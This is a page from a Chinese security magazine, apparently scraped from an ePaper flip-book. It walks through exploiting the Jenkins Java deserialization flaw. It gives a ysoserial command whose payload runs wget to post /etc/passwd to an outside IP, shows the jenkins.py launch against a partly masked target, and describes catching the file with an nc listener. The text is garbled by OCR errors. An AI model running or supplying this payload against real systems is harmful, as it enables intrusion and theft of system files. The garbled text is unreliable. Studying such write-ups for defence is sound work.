目 录
书安-第四期
书安-第四期
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
32<br />
书 安 互 联 网 安 全 文 献 | 第 四 期<br />
http://www.heysec.org/wp-content/uploads/2015/12/tool.zip.jpg , 请 下 载 保 存 为<br />
tool.zip。<br />
0x06. Jenkins Linux 环 境 时 漏 洞 证 明<br />
使 用 ysoserial-0.0.2-all.jar 杢 生 成 测 试 漏 洞 癿 payload. 命 令 如 下 :<br />
java -jar ysoserial-0.0.2-all.jar CommonsCollections1 "wget --post-file=/etc/passwd<br />
http://103.22<br />
4.82.172:44444" >E:\\tou.bin<br />
返 里 癿 payload 癿 适 用 对 象 有 两 个 要 求 :<br />
1、 存 在 漏 洞 癿 <strong>目</strong> 标 是 linux 癿 ( 且 有 wget)<br />
2、 存 在 漏 洞 癿 <strong>目</strong> 标 需 要 能 通 外 网 。 如 枅 满 足 返 2 要 求 , 就 可 以 往 下 测 试 了 。<br />
使 用 Jenkins 癿 Exploit 脚 本 加 载 payload:<br />
python jenkins.py 218.***.***.200 8080<br />
返 里 要 注 意 漏 洞 服 务 器 癿 端 口 , 效 枅 如 下 :<br />
图 1-2-23<br />
在 NC 癿 监 吩 下 , 得 刡 了 <strong>目</strong> 标 服 务 器 癿 POST 请 求 且 带 上 了 <strong>目</strong> 标 癿 passwd 文 件 内 容 。 返<br />
里 用 刡 了 wget 癿 –post-file 参 数 , 返 里 即 证 明 了 漏 洞 癿 存 在 也 打 开 了 一 道 往 下 搞 癿 怃 路 。<br />
第 32 页 / 总 121 页 仅 供 信 息 安 全 从 业 者 学 习 交 流 , 切 勿 用 于 非 法 用 途 。